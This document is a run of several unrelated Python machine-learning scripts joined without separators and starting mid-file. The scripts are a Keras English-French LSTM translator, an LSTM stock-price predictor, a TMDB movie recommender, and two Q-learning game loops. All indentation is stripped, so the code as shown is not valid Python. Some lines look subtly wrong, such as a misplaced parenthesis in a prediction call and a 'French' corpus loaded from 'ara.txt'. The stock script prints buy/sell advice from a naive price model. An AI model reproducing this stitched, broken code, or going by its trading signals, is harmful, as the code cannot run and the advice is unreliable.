model.fit_generator(get_batches(X_train, y_train, X_tk, y_tk, source_sequence_length, target_sequence_length),
validation_data=get_batches(X_test, y_test, X_tk, y_tk, source_sequence_length, target_sequence_length),
epochs=EPOCHS, steps_per_epoch=(len(X_train) // BATCH_SIZE),
validation_steps=(len(X_test) // BATCH_SIZE),
callbacks=[checkpointer])
print("[+] Model trained.")
model.save("results/eng_fra_v1.h5")
print("[+] Model saved.")
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import GRU, Input, Dense, TimeDistributed, Activation, RepeatVector, Bidirectional, Flatten
from tensorflow.keras.layers import Dropout, LSTM
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.losses import sparse_categorical_crossentropy
import collections
import numpy as np
LSTM_UNITS = 128
def get_data(file):
X = []
y = []
# loading the data
for line in open(file, encoding="utf-8"):
if "\t" not in line:
continue
# split by tab
line = line.strip().split("\t")
input = line[0]
output = line[1]
X.append(input)
y.append(output)
return X, y
def create_encdec_model(input_shape, output_sequence_length, english_vocab_size, french_vocab_size):
model = Sequential()
model.add(LSTM(LSTM_UNITS, input_shape=input_shape[1:]))
model.add(RepeatVector(output_sequence_length))
model.add(LSTM(LSTM_UNITS, return_sequences=True))
model.add(TimeDistributed(Dense(french_vocab_size, activation="softmax")))
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["categorical_accuracy"])
return model
def tokenize(x):
"""
Tokenize x
:param x: List of sentences/strings to be tokenized
:return: Tuple of (tokenized x data, tokenizer used to tokenize x)
"""
# TODO: Implement
t = Tokenizer()
t.fit_on_texts(x)
return t.texts_to_sequences(x), t
def pad(x, length=None):
"""
Pad x
:param x: List of sequences.
:param length: Length to pad the sequence to. If None, use length of longest sequence in x.
:return: Padded numpy array of sequences
"""
# TODO: Implement
sequences = pad_sequences(x, maxlen=length, padding='post')
return sequences
def preprocess(x, y):
"""
Preprocess x and y
:param x: Feature List of sentences
:param y: Label List of sentences
:return: Tuple of (Preprocessed x, Preprocessed y, x tokenizer, y tokenizer)
"""
preprocess_x, x_tk = tokenize(x)
preprocess_y, y_tk = tokenize(y)
preprocess_x = pad(preprocess_x)
preprocess_y = pad(preprocess_y)
# Keras's sparse_categorical_crossentropy function requires the labels to be in 3 dimensions
preprocess_y = preprocess_y.reshape(*preprocess_y.shape, 1)
return preprocess_x, preprocess_y, x_tk, y_tk
def logits_to_text(logits, tokenizer):
"""
Turn logits from a neural network into text using the tokenizer
:param logits: Logits from a neural network
:param tokenizer: Keras Tokenizer fit on the labels
:return: String that represents the text of the logits
"""
index_to_words = {id: word for word, id in tokenizer.word_index.items()}
index_to_words[0] = '<PAD>'
return ' '.join([index_to_words[prediction] for prediction in np.argmax(logits, 1)])
if __name__ == "__main__":
X, y = get_data("ara.txt")
english_words = [word for sentence in X for word in sentence.split()]
french_words = [word for sentence in y for word in sentence.split()]
english_words_counter = collections.Counter(english_words)
french_words_counter = collections.Counter(french_words)
print('{} English words.'.format(len(english_words)))
print('{} unique English words.'.format(len(english_words_counter)))
print('10 Most common words in the English dataset:')
print('"' + '" "'.join(list(zip(*english_words_counter.most_common(10)))[0]) + '"')
print()
print('{} French words.'.format(len(french_words)))
print('{} unique French words.'.format(len(french_words_counter)))
print('10 Most common words in the French dataset:')
print('"' + '" "'.join(list(zip(*french_words_counter.most_common(10)))[0]) + '"')
# Tokenize Example output
text_sentences = [
'The quick brown fox jumps over the lazy dog .',
'By Jove , my quick study of lexicography won a prize .',
'This is a short sentence .']
text_tokenized, text_tokenizer = tokenize(text_sentences)
print(text_tokenizer.word_index)
print()
for sample_i, (sent, token_sent) in enumerate(zip(text_sentences, text_tokenized)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(sent))
print(' Output: {}'.format(token_sent))
# Pad Tokenized output
test_pad = pad(text_tokenized)
for sample_i, (token_sent, pad_sent) in enumerate(zip(text_tokenized, test_pad)):
print('Sequence {} in x'.format(sample_i + 1))
print(' Input: {}'.format(np.array(token_sent)))
print(' Output: {}'.format(pad_sent))
preproc_english_sentences, preproc_french_sentences, english_tokenizer, french_tokenizer =\
preprocess(X, y)
max_english_sequence_length = preproc_english_sentences.shape[1]
max_french_sequence_length = preproc_french_sentences.shape[1]
english_vocab_size = len(english_tokenizer.word_index)
french_vocab_size = len(french_tokenizer.word_index)
print('Data Preprocessed')
print("Max English sentence length:", max_english_sequence_length)
print("Max French sentence length:", max_french_sequence_length)
print("English vocabulary size:", english_vocab_size)
print("French vocabulary size:", french_vocab_size)
tmp_x = pad(preproc_english_sentences, preproc_french_sentences.shape[1])
tmp_x = tmp_x.reshape((-1, preproc_french_sentences.shape[-2], 1))
print("tmp_x.shape:", tmp_x.shape)
print("preproc_french_sentences.shape:", preproc_french_sentences.shape)
# Train the neural network
# increased passed index length by 1 to avoid index error
encdec_rnn_model = create_encdec_model(
tmp_x.shape,
preproc_french_sentences.shape[1],
len(english_tokenizer.word_index)+1,
len(french_tokenizer.word_index)+1)
print(encdec_rnn_model.summary())
# reduced batch size
encdec_rnn_model.fit(tmp_x, preproc_french_sentences, batch_size=256, epochs=3, validation_split=0.2)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[1].reshape((1, tmp_x[1].shape[0], 1, )))[0], french_tokenizer))
print("Original text and translation:")
print(X[1])
print(y[1])
# OPTIONAL: Train and Print prediction(s)
print("="*50)
# Print prediction(s)
print(logits_to_text(encdec_rnn_model.predict(tmp_x[10].reshape((1, tmp_x[1].shape[0], 1, ))[0]), french_tokenizer))
print("Original text and translation:")
print(X[10])
print(y[10])
# OPTIONAL: Train and Print prediction(s)
from tensorflow.keras.layers import LSTM, Dense, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.metrics import mean_absolute_error, mean_squared_error, accuracy_score
import os
import time
import glob
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from utils import classify, shift, create_model, load_data
class PricePrediction:
"""A Class utility to train and predict price of stocks/cryptocurrencies/trades
using keras model"""
def __init__(self, ticker_name, **kwargs):
"""
:param ticker_name (str): ticker name, e.g. aapl, nflx, etc.
:param n_steps (int): sequence length used to predict, default is 60
:param price_column (str): the name of column that contains price predicted, default is 'adjclose'
:param feature_columns (list): a list of feature column names used to train the model,
default is ['adjclose', 'volume', 'open', 'high', 'low']
:param target_column (str): target column name, default is 'future'
:param lookup_step (int): the future lookup step to predict, default is 1 (e.g. next day)
:param shuffle (bool): whether to shuffle the dataset, default is True
:param verbose (int): verbosity level, default is 1
==========================================
Model parameters
:param n_layers (int): number of recurrent neural network layers, default is 3
:param cell (keras.layers.RNN): RNN cell used to train keras model, default is LSTM
:param units (int): number of units of cell, default is 256
:param dropout (float): dropout rate ( from 0 to 1 ), default is 0.3
==========================================
Training parameters
:param batch_size (int): number of samples per gradient update, default is 64
:param epochs (int): number of epochs, default is 100
:param optimizer (str, keras.optimizers.Optimizer): optimizer used to train, default is 'adam'
:param loss (str, function): loss function used to minimize during training,
default is 'mae'
:param test_size (float): test size ratio from 0 to 1, default is 0.15
"""
self.ticker_name = ticker_name
self.n_steps = kwargs.get("n_steps", 60)
self.price_column = kwargs.get("price_column", 'adjclose')
self.feature_columns = kwargs.get("feature_columns", ['adjclose', 'volume', 'open', 'high', 'low'])
self.target_column = kwargs.get("target_column", "future")
self.lookup_step = kwargs.get("lookup_step", 1)
self.shuffle = kwargs.get("shuffle", True)
self.verbose = kwargs.get("verbose", 1)
self.n_layers = kwargs.get("n_layers", 3)
self.cell = kwargs.get("cell", LSTM)
self.units = kwargs.get("units", 256)
self.dropout = kwargs.get("dropout", 0.3)
self.batch_size = kwargs.get("batch_size", 64)
self.epochs = kwargs.get("epochs", 100)
self.optimizer = kwargs.get("optimizer", "adam")
self.loss = kwargs.get("loss", "mae")
self.test_size = kwargs.get("test_size", 0.15)
# create unique model name
self._update_model_name()
# runtime attributes
self.model_trained = False
self.data_loaded = False
self.model_created = False
# test price values
self.test_prices = None
# predicted price values for the test set
self.y_pred = None
# prices converted to buy/sell classes
self.classified_y_true = None
# predicted prices converted to buy/sell classes
self.classified_y_pred = None
# most recent price
self.last_price = None
# make folders if does not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
def create_model(self):
"""Construct and compile the keras model"""
self.model = create_model(input_length=self.n_steps,
units=self.units,
cell=self.cell,
dropout=self.dropout,
n_layers=self.n_layers,
loss=self.loss,
optimizer=self.optimizer)
self.model_created = True
if self.verbose > 0:
print("[+] Model created")
def train(self, override=False):
"""Train the keras model using self.checkpointer and self.tensorboard as keras callbacks.
If model created already trained, this method will load the weights instead of training from scratch.
Note that this method will create the model and load data if not called before."""
# if model isn't created yet, create it
if not self.model_created:
self.create_model()
# if data isn't loaded yet, load it
if not self.data_loaded:
self.load_data()
# if the model already exists and trained, just load the weights and return
# but if override is True, then just skip loading weights
if not override:
model_name = self._model_exists()
if model_name:
self.model.load_weights(model_name)
self.model_trained = True
if self.verbose > 0:
print("[*] Model weights loaded")
return
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
model_filename = self._get_model_filename()
self.checkpointer = ModelCheckpoint(model_filename, save_best_only=True, verbose=1)
self.tensorboard = TensorBoard(log_dir=f"logs\{self.model_name}")
self.history = self.model.fit(self.X_train, self.y_train,
batch_size=self.batch_size,
epochs=self.epochs,
validation_data=(self.X_test, self.y_test),
callbacks=[self.checkpointer, self.tensorboard],
verbose=1)
self.model_trained = True
if self.verbose > 0:
print("[+] Model trained")
def predict(self, classify=False):
"""Predicts next price for the step self.lookup_step.
when classify is True, returns 0 for sell and 1 for buy"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
# reshape to fit the model input
last_sequence = self.last_sequence.reshape((self.last_sequence.shape[1], self.last_sequence.shape[0]))
# expand dimension
last_sequence = np.expand_dims(last_sequence, axis=0)
predicted_price = self.column_scaler[self.price_column].inverse_transform(self.model.predict(last_sequence))[0][0]
if classify:
last_price = self.get_last_price()
return 1 if last_price < predicted_price else 0
else:
return predicted_price
def load_data(self):
"""Loads and preprocess data"""
filename, exists = self._df_exists()
if exists:
# if the updated dataframe already exists in disk, load it
self.ticker = pd.read_csv(filename)
ticker = self.ticker
if self.verbose > 0:
print("[*] Dataframe loaded from disk")
else:
ticker = self.ticker_name
result = load_data(ticker,n_steps=self.n_steps, lookup_step=self.lookup_step,
shuffle=self.shuffle, feature_columns=self.feature_columns,
price_column=self.price_column, test_size=self.test_size)
# extract data
self.df = result['df']
self.X_train = result['X_train']
self.X_test = result['X_test']
self.y_train = result['y_train']
self.y_test = result['y_test']
self.column_scaler = result['column_scaler']
self.last_sequence = result['last_sequence']
if self.shuffle:
self.unshuffled_X_test = result['unshuffled_X_test']
self.unshuffled_y_test = result['unshuffled_y_test']
else:
self.unshuffled_X_test = self.X_test
self.unshuffled_y_test = self.y_test
self.original_X_test = self.unshuffled_X_test.reshape((self.unshuffled_X_test.shape[0], self.unshuffled_X_test.shape[2], -1))
self.data_loaded = True
if self.verbose > 0:
print("[+] Data loaded")
# save the dataframe to disk
self.save_data()
def get_last_price(self):
"""Returns the last price ( i.e the most recent price )"""
if not self.last_price:
self.last_price = float(self.df[self.price_column].tail(1))
return self.last_price
def get_test_prices(self):
"""Returns test prices. Note that this function won't return the whole sequences,
instead, it'll return only the last value of each sequence"""
if self.test_prices is None:
current = np.squeeze(self.column_scaler[self.price_column].inverse_transform([[ v[-1][0] for v in self.original_X_test ]]))
future = np.squeeze(self.column_scaler[self.price_column].inverse_transform(np.expand_dims(self.unshuffled_y_test, axis=0)))
self.test_prices = np.array(list(current) + [future[-1]])
return self.test_prices
def get_y_pred(self):
"""Get predicted values of the testing set of sequences ( y_pred )"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
if self.y_pred is None:
self.y_pred = np.squeeze(self.column_scaler[self.price_column].inverse_transform(self.model.predict(self.unshuffled_X_test)))
return self.y_pred
def get_y_true(self):
"""Returns original y testing values ( y_true )"""
test_prices = self.get_test_prices()
return test_prices[1:]
def _get_shifted_y_true(self):
"""Returns original y testing values shifted by -1.
This function is useful for converting to a classification problem"""
test_prices = self.get_test_prices()
return test_prices[:-1]
def _calc_classified_prices(self):
"""Convert regression predictions to a classification predictions ( buy or sell )
and set results to self.classified_y_pred for predictions and self.classified_y_true
for true prices"""
if self.classified_y_true is None or self.classified_y_pred is None:
current_prices = self._get_shifted_y_true()
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
self.classified_y_true = list(map(classify, current_prices, future_prices))
self.classified_y_pred = list(map(classify, current_prices, predicted_prices))
# some metrics
def get_MAE(self):
"""Calculates the Mean-Absolute-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_absolute_error(y_true, y_pred)
def get_MSE(self):
"""Calculates the Mean-Squared-Error metric of the test set"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
y_true = self.get_y_true()
y_pred = self.get_y_pred()
return mean_squared_error(y_true, y_pred)
def get_accuracy(self):
"""Calculates the accuracy after adding classification approach (buy/sell)"""
if not self.model_trained:
raise RuntimeError("Model is not trained yet, call model.train() first.")
self._calc_classified_prices()
return accuracy_score(self.classified_y_true, self.classified_y_pred)
def plot_test_set(self):
"""Plots test data"""
future_prices = self.get_y_true()
predicted_prices = self.get_y_pred()
plt.plot(future_prices, c='b')
plt.plot(predicted_prices, c='r')
plt.xlabel("Days")
plt.ylabel("Price")
plt.legend(["Actual Price", "Predicted Price"])
plt.show()
def save_data(self):
"""Saves the updated dataframe if it does not exist"""
filename, exists = self._df_exists()
if not exists:
self.df.to_csv(filename)
if self.verbose > 0:
print("[+] Dataframe saved")
def _update_model_name(self):
stock = self.ticker_name.replace(" ", "_")
feature_columns_str = ''.join([ c[0] for c in self.feature_columns ])
time_now = time.strftime("%Y-%m-%d")
self.model_name = f"{time_now}_{stock}-{feature_columns_str}-loss-{self.loss}-{self.cell.__name__}-seq-{self.n_steps}-step-{self.lookup_step}-layers-{self.n_layers}-units-{self.units}"
def _get_df_name(self):
"""Returns the updated dataframe name"""
time_now = time.strftime("%Y-%m-%d")
return f"data/{self.ticker_name}_{time_now}.csv"
def _df_exists(self):
"""Check if the updated dataframe exists in disk, returns a tuple contains (filename, file_exists)"""
filename = self._get_df_name()
return filename, os.path.isfile(filename)
def _get_model_filename(self):
"""Returns the relative path of this model name with h5 extension"""
return f"results/{self.model_name}.h5"
def _model_exists(self):
"""Checks if model already exists in disk, returns the filename,
returns None otherwise"""
filename = self._get_model_filename()
return filename if os.path.isfile(filename) else None
# uncomment below to use CPU instead of GPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=4,
# inter_op_parallelism_threads=4,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from tensorflow.keras.layers import GRU, LSTM
from price_prediction import PricePrediction
ticker = "AAPL"
p = PricePrediction(ticker, feature_columns=['adjclose', 'volume', 'open', 'high', 'low'],
epochs=700, cell=LSTM, optimizer="rmsprop", n_layers=3, units=256,
loss="mse", shuffle=True, dropout=0.4)
p.train(True)
print(f"The next predicted price for {ticker} is {p.predict()}")
buy_sell = p.predict(classify=True)
print(f"you should {'sell' if buy_sell == 0 else 'buy'}.")
print("Mean Absolute Error:", p.get_MAE())
print("Mean Squared Error:", p.get_MSE())
print(f"Accuracy: {p.get_accuracy()*100:.3f}%")
p.plot_test_set()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from yahoo_fin import stock_info as si
from collections import deque
import pandas as pd
import numpy as np
import random
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3, loss="mean_absolute_error", optimizer="rmsprop"):
model = Sequential()
for i in range(n_layers):
if i == 0:
# first layer
model.add(cell(units, return_sequences=True, input_shape=(None, input_length)))
model.add(Dropout(dropout))
elif i == n_layers -1:
# last layer
model.add(cell(units, return_sequences=False))
model.add(Dropout(dropout))
else:
# middle layers
model.add(cell(units, return_sequences=True))
model.add(Dropout(dropout))
model.add(Dense(1, activation="linear"))
model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
return model
def load_data(ticker, n_steps=60, scale=True, split=True, balance=False, shuffle=True,
lookup_step=1, test_size=0.15, price_column='Price', feature_columns=['Price'],
target_column="future", buy_sell=False):
"""Loads data from yahoo finance, if the ticker is a pd Dataframe,
it'll use it instead"""
if isinstance(ticker, str):
df = si.get_data(ticker)
elif isinstance(ticker, pd.DataFrame):
df = ticker
else:
raise TypeError("ticker can be either a str, or a pd.DataFrame instance")
result = {}
result['df'] = df.copy()
# make sure that columns passed is in the dataframe
for col in feature_columns:
assert col in df.columns
column_scaler = {}
if scale:
# scale the data ( from 0 to 1 )
for column in feature_columns:
scaler = preprocessing.MinMaxScaler()
df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
column_scaler[column] = scaler
# df[column] = preprocessing.scale(df[column].values)
# add column scaler to the result
result['column_scaler'] = column_scaler
# add future price column ( shift by -1 )
df[target_column] = df[price_column].shift(-lookup_step)
# get last feature elements ( to add them to the last sequence )
# before deleted by df.dropna
last_feature_element = np.array(df[feature_columns].tail(1))
# clean NaN entries
df.dropna(inplace=True)
if buy_sell:
# convert target column to 0 (for sell -down- ) and to 1 ( for buy -up-)
df[target_column] = list(map(classify, df[price_column], df[target_column]))
seq_data = [] # all sequences here
# sequences are made with deque, which keeps the maximum length by popping out older values as new ones come in
sequences = deque(maxlen=n_steps)
for entry, target in zip(df[feature_columns].values, df[target_column].values):
sequences.append(entry)
if len(sequences) == n_steps:
seq_data.append([np.array(sequences), target])
# get the last sequence for future predictions
last_sequence = np.array(sequences)
# shift the sequence, one element is missing ( deleted by dropna )
last_sequence = shift(last_sequence, -1)
# fill the last element
last_sequence[-1] = last_feature_element
# add last sequence to results
result['last_sequence'] = last_sequence
if buy_sell and balance:
buys, sells = [], []
for seq, target in seq_data:
if target == 0:
sells.append([seq, target])
else:
buys.append([seq, target])
# balancing the dataset
lower_length = min(len(buys), len(sells))
buys = buys[:lower_length]
sells = sells[:lower_length]
seq_data = buys + sells
if shuffle:
unshuffled_seq_data = seq_data.copy()
# shuffle data
random.shuffle(seq_data)
X, y = [], []
for seq, target in seq_data:
X.append(seq)
y.append(target)
X = np.array(X)
y = np.array(y)
if shuffle:
unshuffled_X, unshuffled_y = [], []
for seq, target in unshuffled_seq_data:
unshuffled_X.append(seq)
unshuffled_y.append(target)
unshuffled_X = np.array(unshuffled_X)
unshuffled_y = np.array(unshuffled_y)
unshuffled_X = unshuffled_X.reshape((unshuffled_X.shape[0], unshuffled_X.shape[2], unshuffled_X.shape[1]))
X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
if not split:
# return original_df, X, y, column_scaler, last_sequence
result['X'] = X
result['y'] = y
return result
else:
# split dataset into training and testing
n_samples = X.shape[0]
train_samples = int(n_samples * (1 - test_size))
result['X_train'] = X[:train_samples]
result['X_test'] = X[train_samples:]
result['y_train'] = y[:train_samples]
result['y_test'] = y[train_samples:]
if shuffle:
result['unshuffled_X_test'] = unshuffled_X[train_samples:]
result['unshuffled_y_test'] = unshuffled_y[train_samples:]
return result
# from sentdex
def classify(current, future):
if float(future) > float(current): # if the future price is higher than the current, that's a buy, or a 1
return 1
else: # otherwise... it's a 0!
return 0
def shift(arr, num, fill_value=np.nan):
result = np.empty_like(arr)
if num > 0:
result[:num] = fill_value
result[num:] = arr[:-num]
elif num < 0:
result[num:] = fill_value
result[:num] = arr[-num:]
else:
result = arr
return result
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_extraction.text import TfidfVectorizer
movies_path = r"E:\datasets\recommender_systems\tmdb_5000_movies.csv"
credits_path = r"E:\datasets\recommender_systems\tmdb_5000_credits.csv"
credits = pd.read_csv(credits_path)
movies = pd.read_csv(movies_path)
# rename movie_id to id to merge dataframes later
credits = credits.rename(index=str, columns={'movie_id': 'id'})
# join on movie id column
movies = movies.merge(credits, on="id")
# drop useless columns
movies = movies.drop(columns=['homepage', 'title_x', 'title_y', 'status', 'production_countries'])
# number of votes of the movie
V = movies['vote_count']
# rating average of the movie from 0 to 10
R = movies['vote_average']
# the mean vote across the whole report
C = movies['vote_average'].mean()
# minimum votes required to be listed in the top 250
m = movies['vote_count'].quantile(0.7)
movies['weighted_average'] = (V/(V+m) * R) + (m/(m+V) * C)
# ranked movies
wavg = movies.sort_values('weighted_average', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=wavg['weighted_average'].head(10), y=wavg['original_title'].head(10), data=wavg, palette='deep')
plt.xlim(6.75, 8.35)
plt.title('"Best" Movies by TMDB Votes', weight='bold')
plt.xlabel('Weighted Average Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('best_movies.png')
popular = movies.sort_values('popularity', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=popular['popularity'].head(10), y=popular['original_title'].head(10), data=popular, palette='deep')
plt.title('"Most Popular" Movies by TMDB Votes', weight='bold')
plt.xlabel('Popularity Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('popular_movies.png')
############ Content-Based ############
# filling NaNs with empty string
movies['overview'] = movies['overview'].fillna('')
tfv = TfidfVectorizer(min_df=3, max_features=None,
strip_accents='unicode', analyzer='word',token_pattern=r'\w{1,}',
ngram_range=(1, 3), use_idf=1,smooth_idf=1,sublinear_tf=1,
stop_words = 'english')
tfv_matrix = tfv.fit_transform(movies['overview'])
print(tfv_matrix.shape)
print(tfv_matrix)
import numpy as np
from PIL import Image
import cv2 # showing the env
import matplotlib.pyplot as plt
import pickle
from matplotlib import style
import time
import os
from collections.abc import Iterable
style.use("ggplot")
GRID_SIZE = 10
# how many episodes
EPISODES = 1_000
# how many steps in the env
STEPS = 200
# Rewards for differents events
MOVE_REWARD = -1
ENEMY_REWARD = -300
FOOD_REWARD = 30
epsilon = 0 # for randomness, it'll decay over time by EPSILON_DECAY
EPSILON_DECAY = 0.999993 # every episode, epsilon *= EPSILON_DECAY
SHOW_EVERY = 1
q_table = f"qtable-grid-{GRID_SIZE}-steps-{STEPS}.npy" # put here pretrained model ( if exists )
LEARNING_RATE = 0.1
DISCOUNT = 0.95
PLAYER_CODE = 1
FOOD_CODE = 2
ENEMY_CODE = 3
# blob dict, for colors
COLORS = {
PLAYER_CODE: (255, 120, 0), # blueish color
FOOD_CODE: (0, 255, 0), # green
ENEMY_CODE: (0, 0, 255), # red
}
ACTIONS = {
0: (0, 1),
1: (-1, 0),
2: (0, -1),
3: (1, 0)
}
N_ENEMIES = 2
def get_observation(cords):
obs = []
for item1 in cords:
for item2 in item1:
obs.append(item2+GRID_SIZE-1)
return tuple(obs)
class Blob:
def __init__(self, name=None):
self.x = np.random.randint(0, GRID_SIZE)
self.y = np.random.randint(0, GRID_SIZE)
self.name = name if name else "Blob"
def __sub__(self, other):
return (self.x - other.x, self.y - other.y)
def __str__(self):
return f"<{self.name.capitalize()} x={self.x}, y={self.y}>"
def move(self, x=None, y=None):
# if x is None, move randomly
if x is None:
self.x += np.random.randint(-1, 2)
else:
self.x += x
# if y is None, move randomly
if y is None:
self.y += np.random.randint(-1, 2)
else:
self.y += y
# out of bound fix
if self.x < 0:
# self.x = GRID_SIZE-1
self.x = 0
elif self.x > GRID_SIZE-1:
# self.x = 0
self.x = GRID_SIZE-1
if self.y < 0:
# self.y = GRID_SIZE-1
self.y = 0
elif self.y > GRID_SIZE-1:
# self.y = 0
self.y = GRID_SIZE-1
def take_action(self, choice):
# if choice == 0:
# self.move(x=1, y=1)
# elif choice == 1:
# self.move(x=-1, y=-1)
# elif choice == 2:
# self.move(x=-1, y=1)
# elif choice == 3:
# self.move(x=1, y=-1)
for code, (move_x, move_y) in ACTIONS.items():
if choice == code:
self.move(x=move_x, y=move_y)
# if choice == 0:
# self.move(x=1, y=0)
# elif choice == 1:
# self.move(x=0, y=1)
# elif choice == 2:
# self.move(x=-1, y=0)
# elif choice == 3:
# self.move(x=0, y=-1)
# construct the q_table if not already trained
if q_table is None or not os.path.isfile(q_table):
# q_table = {}
# # for every possible combination of the distance of the player
# # to both the food and the enemy
# for i in range(-GRID_SIZE+1, GRID_SIZE):
# for ii in range(-GRID_SIZE+1, GRID_SIZE):
# for iii in range(-GRID_SIZE+1, GRID_SIZE):
# for iiii in range(-GRID_SIZE+1, GRID_SIZE):
# q_table[(i, ii), (iii, iiii)] = np.random.uniform(-5, 0, size=len(ACTIONS))
q_table = np.random.uniform(-5, 0, size=[GRID_SIZE*2-1]*(2+2*N_ENEMIES) + [len(ACTIONS)])
else:
# the q table already exists
print("Loading Q-table")
q_table = np.load(q_table)
# this list for tracking rewards
episode_rewards = []
# game loop
for episode in range(EPISODES):
# initialize our blobs ( squares )
player = Blob("Player")
food = Blob("Food")
enemy1 = Blob("Enemy1")
enemy2 = Blob("Enemy2")
if episode % SHOW_EVERY == 0:
print(f"[{episode:05}] ep: {epsilon:.4f} reward mean: {np.mean(episode_rewards[-SHOW_EVERY:])} alpha={LEARNING_RATE}")
show = True
else:
show = False
episode_reward = 0
for i in range(STEPS):
# get the observation
obs = get_observation((player - food, player - enemy1, player - enemy2))
# Epsilon-greedy policy
if np.random.random() > epsilon:
# get the action from the q table
action = np.argmax(q_table[obs])
else:
# random action
action = np.random.randint(0, len(ACTIONS))
# take the action
player.take_action(action)
#### MAYBE ###
#enemy.move()
#food.move()
##############
food.move()
enemy1.move()
enemy2.move()
### for rewarding
if player.x == enemy1.x and player.y == enemy1.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == enemy2.x and player.y == enemy2.y:
# if it hit the enemy, punish
reward = ENEMY_REWARD
elif player.x == food.x and player.y == food.y:
# if it hit the food, reward
reward = FOOD_REWARD
else:
# else, punish it a little for moving
reward = MOVE_REWARD
### calculate the Q
# get the future observation after taking action
future_obs = get_observation((player - food, player - enemy1, player - enemy2))
# get the max future Q value (SarsaMax algorithm)
# SARSA = State0, Action0, Reward0, State1, Action1
max_future_q = np.max(q_table[future_obs])
# get the current Q
current_q = q_table[obs][action]
# calculate the new Q
if reward == FOOD_REWARD:
new_q = FOOD_REWARD
else:
# value iteration update
# https://en.wikipedia.org/wiki/Q-learning
# Calculate the Temporal-Difference target
td_target = reward + DISCOUNT * max_future_q
# Temporal-Difference
new_q = (1 - LEARNING_RATE) * current_q + LEARNING_RATE * td_target
# update the q
q_table[obs][action] = new_q
if show:
env = np.zeros((GRID_SIZE, GRID_SIZE, 3), dtype=np.uint8)
# set food blob to green
env[food.x][food.y] = COLORS[FOOD_CODE]
# set the enemy blob to red
env[enemy1.x][enemy1.y] = COLORS[ENEMY_CODE]
env[enemy2.x][enemy2.y] = COLORS[ENEMY_CODE]
# set the player blob to blueish
env[player.x][player.y] = COLORS[PLAYER_CODE]
# get the image
image = Image.fromarray(env, 'RGB')
image = image.resize((600, 600))
# show the image
cv2.imshow("image", np.array(image))
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
if cv2.waitKey(500) == ord('q'):
break
else:
if cv2.waitKey(100) == ord('q'):
break
episode_reward += reward
if reward == FOOD_REWARD or reward == ENEMY_REWARD:
break
episode_rewards.append(episode_reward)
# decay a little randomness in each episode
epsilon *= EPSILON_DECAY
# with open(f"qtable-{int(time.time())}.pickle", "wb") as f:
# pickle.dump(q_table, f)
np.save(f"qtable-grid-{GRID_SIZE}-steps-{STEPS}", q_table)
moving_avg = np.convolve(episode_rewards, np.ones((SHOW_EVERY,))/SHOW_EVERY, mode='valid')
plt.plot([i for i in range(len(moving_avg))], moving_avg)
plt.ylabel(f"Avg Reward every {SHOW_EVERY}")
plt.xlabel("Episode")
plt.show()
import numpy as np
import gym
import random
import matplotlib.pyplot as plt
import os
import time
env = gym.make("Taxi-v2").env
# init the Q-Table
# (500x6) matrix (n_states x n_actions)
q_table = np.zeros((env.observation_space.n, env.action_space.n))
# Hyper Parameters
# alpha
LEARNING_RATE = 0.1
# gamma
DISCOUNT_RATE = 0.9
EPSILON = 0.9
EPSILON_DECAY = 0.99993
EPISODES = 100_000
SHOW_EVERY = 1_000
# for plotting metrics
all_epochs = []
all_penalties = []
all_rewards = []
for i in range(EPISODES):
# reset the env
state = env.reset()
epochs, penalties, rewards = 0, 0, []
done = False
while not done:
if random.random() < EPSILON:
# exploration
action = env.action_space.sample()
else:
# exploitation
action = np.argmax(q_table[state])
next_state, reward, done, info = env.step(action)
old_q = q_table[state, action]
future_q = np.max(q_table[next_state])
# calculate the new Q ( Q-Learning equation, i.e SARSAMAX )
new_q = (1 - LEARNING_RATE) * old_q + LEARNING_RATE * ( reward + DISCOUNT_RATE * future_q)
# update the new Q
q_table[state, action] = new_q
if reward == -10:
penalties += 1
state = next_state
epochs += 1
rewards.append(reward)
if i % SHOW_EVERY == 0:
print(f"[{i}] avg reward:{np.average(all_rewards):.4f} eps:{EPSILON:.4f}")
# env.render()
all_epochs.append(epochs)
all_penalties.append(penalties)
all_rewards.append(np.average(rewards))
EPSILON *= EPSILON_DECAY
# env.render()
# plt.plot(list(range(len(all_rewards))), all_rewards)
# plt.show()
print("Playing in 5 seconds...")
time.sleep(5)
